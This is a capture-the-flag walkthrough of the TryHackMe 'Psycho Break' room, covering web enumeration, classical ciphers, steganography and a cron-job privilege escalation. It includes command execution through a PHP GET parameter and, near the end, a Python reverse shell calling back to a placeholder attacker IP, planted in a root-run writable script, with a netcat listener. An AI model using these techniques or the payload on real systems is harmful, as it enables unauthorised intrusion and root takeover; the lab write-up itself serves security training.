Tryhackme Psycho Break Writeup

Hello guys. This machine, Psycho Break on TryHackMe, is themed on the game “Evil Within”. It is a beginner-friendly room that includes some directory brute-forcing, a few classical ciphers, and privilege escalation through a writable cron job.

https://tryhackme.com/room/psychobreak

Let’s start with an Nmap scan (SYN scan with default scripts and version detection; -sS needs root)

< nmap -sS -sC -sV $MACHINE_IP >

Looking at the Nmap results, only 3 ports are open

  • 21 FTP (No Anonymous Login)
  • 22 SSH
  • 80 Apache

Starting with port 80, we have

Home page

Looking through the source code for something interesting is still a classic first step

Source page

Looks like we have a directory named < /sadistRoom >

Click here

We got the key to the Locker Room. If we wait here for some time, the page reloads and asks us to enter the key; after entering it we can go to the Locker Room

Enter the Key
Locker Room

In the Locker Room we have a piece of text, most likely a ciphertext. Let’s check it with the Boxentriq cipher identifier

Atbash Cipher

Let’s decipher it now on CyberChef

Use Recipe Atbash

In the output we now have the key to unlock the map. Great.
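Atbash simply mirrors the alphabet (A becomes Z, B becomes Y, and so on), so the same operation both encrypts and decrypts. As an added example, not part of the original writeup or the room, the block below implements Atbash in Python and adds a small “which cipher is it?” check in the spirit of the Boxentriq analyzer, limited to Atbash and the 25 Caesar shifts and scored with a constructed list of common English words. The sample ciphertext is constructed for the demo and is not the text from the Locker Room.

```python
import re
import string

# Added example, not from the original writeup. Word list and sample text are constructed.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
ATBASH_TABLE = str.maketrans(UPPER + LOWER, UPPER[::-1] + LOWER[::-1])

# Small constructed list of common English words used to rank candidate plaintexts.
COMMON_WORDS = {
    "the", "a", "and", "to", "of", "in", "is", "it", "you", "that", "at",
    "me", "we", "room", "key", "map", "door", "this", "for", "on", "with",
    "meet", "locker",
}


def atbash(text: str) -> str:
    """Mirror every letter in the alphabet (A<->Z, B<->Y, ...).

    Atbash is its own inverse, so the same call encrypts and decrypts.
    Digits, spaces and punctuation pass through unchanged.
    """
    return text.translate(ATBASH_TABLE)


def caesar(text: str, shift: int) -> str:
    """Shift every letter forward by `shift` positions (mod 26)."""
    shift %= 26
    table = str.maketrans(
        UPPER + LOWER,
        UPPER[shift:] + UPPER[:shift] + LOWER[shift:] + LOWER[:shift],
    )
    return text.translate(table)


def english_score(text: str) -> int:
    """Count tokens that are common English words; higher means more plausible."""
    return sum(1 for w in re.findall(r"[a-z]+", text.lower()) if w in COMMON_WORDS)


def best_guess(ciphertext: str):
    """Try Atbash and every Caesar shift; return (name, plaintext, score) of the best one."""
    candidates = [("atbash", atbash(ciphertext))]
    candidates += [(f"caesar-{k}", caesar(ciphertext, k)) for k in range(1, 26)]
    scored = [(name, pt, english_score(pt)) for name, pt in candidates]
    return max(scored, key=lambda c: c[2])


if __name__ == "__main__":
    # Constructed ciphertext, not the one from the room.
    sample = "nvvg nv zg gsv olxpvi illn"
    print(best_guess(sample))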

Enter Previously Found Key
Map Unlocked

We have already seen the first two rooms, so let’s check Safe Heaven now

Safe Heaven

As said previously, checking the source code is a classic

Safe Heaven Source

It tells us to search through it, so let’s run Gobuster against this path to brute-force directories

/keeper is looking good

Looks like we have a directory named < /keeper >. Let’s check it out.

Click it
Ohh No!!!

Within the given time we have to submit the location shown in this image. Our OSINT skills will help here: download the image and run a Google reverse image search on it.

Great, we got the location; just submit it in time

Submit Fast

Awesome!! We got the Keeper’s key.

Remember, we still haven’t looked at the 4th room on the map

Enter the Keeper’s Key
Abandoned Room
Meet Laura

I didn’t know how to escape Laura, so I looked at the source code

Source Page of Laura

First I thought < shell > was some hidden directory, but if we brute-force for it we will not have enough time to escape the spider lady. It is a PHP page, so maybe we can supply a GET parameter named < shell > and have it executed as a command. Let’s try that

It Worked

We can list directories through it, but we still don’t know how to escape her. I then thought I could cat < /etc/passwd > to list users and brute-force SSH with Hydra, but that led to a rabbit hole. Instead, let’s list the parent directory with < ls .. >

It worked again

Yes! There is a hidden directory whose name looks like an MD5 hash. Let’s escape the spider lady now.

We got a .txt file and a .zip file; let’s download both and take a look

.txt file
wget the zip file
Unzipping to see the contents

We have to save Joseph. There is an image file that doesn’t open as an image, so something may be hidden inside it. Let’s run binwalk on it

There is some data
Listing the extracted files

There are two files, one of which is an audio file; listening to it immediately tells us it is Morse code.

We can upload the .wav file to an online Morse decoder and recover the hidden message

There was an image too; the decoded Morse message may be the passphrase for data hidden in it. Let’s extract it with steghide

Thankyou.txt

Awesome, we did save Joseph. Now let’s log in to FTP with the credentials we found

We downloaded all files

There are two files: a binary and a dictionary file. The binary seems to take a key from the user, so let’s brute-force it with the given dictionary and a bit of Python

import subprocess

# Try every line of the supplied wordlist as the key for ./program
# and show what the binary prints so the correct key can be spotted.
with open("random.dic", "r") as f:
    keys = f.read().splitlines()

for key in keys:
    key = key.strip()
    if not key:
        continue
    print(key)
    subprocess.run(["./program", key])

I’m not that good at Python right now, so I took some help from the internet. Using this Python code we can get the correct key; don’t forget to make the program binary executable first

chmod +x program

Key Found

Ugh, another cipher. With some help from the internet I found that it is actually the multi-tap phone cipher, the keypad input of old mobile phones.

Deciphered

The correct key we found for the program binary is the SSH username, and the decoded multi-tap cipher is the password. Let’s SSH our way in
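In the multi-tap cipher each letter is written as its keypad digit repeated once per press (a = 2, b = 22, c = 222, s = 7777), with groups separated by spaces so that consecutive letters on the same key stay distinguishable. As an added example, not part of the original writeup or the room, here is an encoder and decoder in Python; the key layout is the standard 2-9 keypad with 0 for space, and the sample strings are constructed, not the room’s password.

```python
import re

# Added example, not from the original writeup. Standard phone keypad; 0 is space.
KEYPAD = {
    "2": "abc", "3": "def", "4": "ghi", "5": "jkl",
    "6": "mno", "7": "pqrs", "8": "tuv", "9": "wxyz",
    "0": " ",
}
# letter -> (digit, number of presses)
LETTER_TO_PRESSES = {
    ch: (digit, i + 1)
    for digit, letters in KEYPAD.items()
    for i, ch in enumerate(letters)
}


def multitap_decode(cipher: str) -> str:
    """Decode space- or hyphen-separated press groups such as "44 33 555 555 666"."""
    out = []
    for group in re.split(r"[\s\-]+", cipher.strip()):
        if not group:
            continue
        digit = group[0]
        if digit not in KEYPAD or any(c != digit for c in group):
            raise ValueError(f"bad multitap group: {group!r}")
        letters = KEYPAD[digit]
        # Phones wrap around: pressing 2 four times is 'a' again.
        out.append(letters[(len(group) - 1) % len(letters)])
    return "".join(out)


def multitap_encode(text: str) -> str:
    """Encode letters and spaces (case-insensitive); other characters are rejected."""
    groups = []
    for ch in text.lower():
        if ch not in LETTER_TO_PRESSES:
            raise ValueError(f"cannot encode {ch!r}")
        digit, presses = LETTER_TO_PRESSES[ch]
        groups.append(digit * presses)
    return " ".join(groups)


if __name__ == "__main__":
    sample = "44 33 555 555 666"          # constructed sample, decodes to "hello"
    print(multitap_decode(sample))
    print(multitap_encode("save joseph"))
```

Without the separators a string like 4433555555666 is ambiguous (six presses of 5 wrap to a single letter), which is why decoders such as CyberChef and dCode expect the groups to be delimited.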

Got User Flag.txt

Awesome! We got the user flag. Now we have to escalate our privileges. I looked for SUID binaries but nothing stood out, and this user cannot run sudo on the machine. What I did find was a cron job running a script that our user has write permission on.
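The check that finds this class of misconfiguration is simple: read the system crontab, pick out the script each job runs, and test whether the current user can modify it. As an added example, not part of the original writeup or the room, the block below does that in Python for /etc/crontab-style entries; the crontab text, the script paths and the demo job are all constructed for the example rather than taken from the machine.

```python
import os
import re
import shlex
import tempfile

# Added example, not from the original writeup. Sample crontab and paths are constructed.
INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "ruby", "php"}


def parse_crontab(text: str):
    """Return [(user, command)] from /etc/crontab style lines.

    Handles the five time fields and the @reboot/@daily shortcuts; comments,
    blank lines and VAR=value lines are skipped.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)          # @shortcut user command
            if len(fields) == 3:
                entries.append((fields[1], fields[2]))
        else:
            fields = line.split(None, 6)          # m h dom mon dow user command
            if len(fields) == 7:
                entries.append((fields[5], fields[6]))
    return entries


def script_path(command: str):
    """Pick the script a cron command runs: the first absolute-path token that
    is not the interpreter itself (e.g. /usr/bin/python3 /opt/job.py -> /opt/job.py)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    for tok in tokens:
        if tok.startswith("/") and len(tok) > 1 and os.path.basename(tok) not in INTERPRETERS:
            return tok
    return None


def writable_targets(entries):
    """Return (user, path) for every job whose script file the current user can modify."""
    found = []
    for user, command in entries:
        path = script_path(command)
        if path and os.path.isfile(path) and os.access(path, os.W_OK):
            found.append((user, path))
    return found


def demo():
    """Create a throwaway script, a crontab that runs it as root, then scan the crontab."""
    with tempfile.NamedTemporaryFile("w", suffix=".py", delete=False) as f:
        f.write("print('cron job')\n")
        path = f.name
    crontab = (
        "# m h dom mon dow user command\n"
        f"* * * * * root /usr/bin/python3 {path}\n"     # writable by us, runs as root
        "0 3 * * * root /nonexistent/backup.sh\n"       # hypothetical path, does not exist
        "@reboot root /nonexistent/startup.sh\n"        # hypothetical path, does not exist
    )
    return writable_targets(parse_crontab(crontab))


if __name__ == "__main__":
    for user, path in demo():
        print(f"writable job script run as {user}: {path}")
```

On a real box you would feed it the contents of /etc/crontab and the files under /etc/cron.d; a script that is writable and runs as root is exactly the situation exploited in the next step.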

.the_eye_of_ruvik.py

It is a Python script. Since cron runs it with elevated privileges, we replace its contents with a Python reverse shell and set up a netcat listener

import socket
import subprocess
import os
import pty

# Connect back to our listener and attach stdin/stdout/stderr to the socket,
# then spawn a bash with a pty so the shell is usable interactively.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("YOUR_MACHINE_IP", 4242))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/bash")

cat the file to check that everything is in place

Set up a netcat listener

nc -nvlp 4242

Done. Now we just have to wait for the cron job to fire and give us a callback.

You got this, You got this, You got this

Finally we are root. This machine was really fun and we got to learn a lot. Now we can submit the root flag.

B.Tech Undergraduate, Cybersecurity Enthusiast, CTF Player